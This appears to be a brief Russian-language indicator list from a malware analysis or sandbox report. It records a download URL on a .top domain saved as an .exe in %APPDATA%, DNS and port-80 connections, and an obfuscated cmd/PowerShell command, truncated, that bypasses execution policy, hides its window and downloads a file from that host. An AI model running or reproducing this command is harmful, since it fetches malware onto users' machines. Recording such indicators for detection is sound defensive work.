Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWe^RsHE^Ll.EXe -eX^E^cU^T^Io^NpoLiCY^ ^b^yP^AsS ^-^n^oPRof^iLe ^-wI^N^dowsTyLE h^IDden (new-oBjEC^T sysTem.n^E^t.webCLi^E^n^t^).Do^wNLO^AD^FI^lE^('http://aloepolera.top/read...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /c "POWe^RsHE^Ll.EXe -eX^E^cU^T^Io^NpoLiCY^ ^b^yP^AsS ^-^n^oPRof^iLe ^-wI^N^dowsTyLE h^IDden (new-oBjEC^T sysTem.n^E^t.webCLi^E^n^t^).Do^wNLO^AD^FI^lE^('http://aloepolera.top/read...' (со скрытым окном)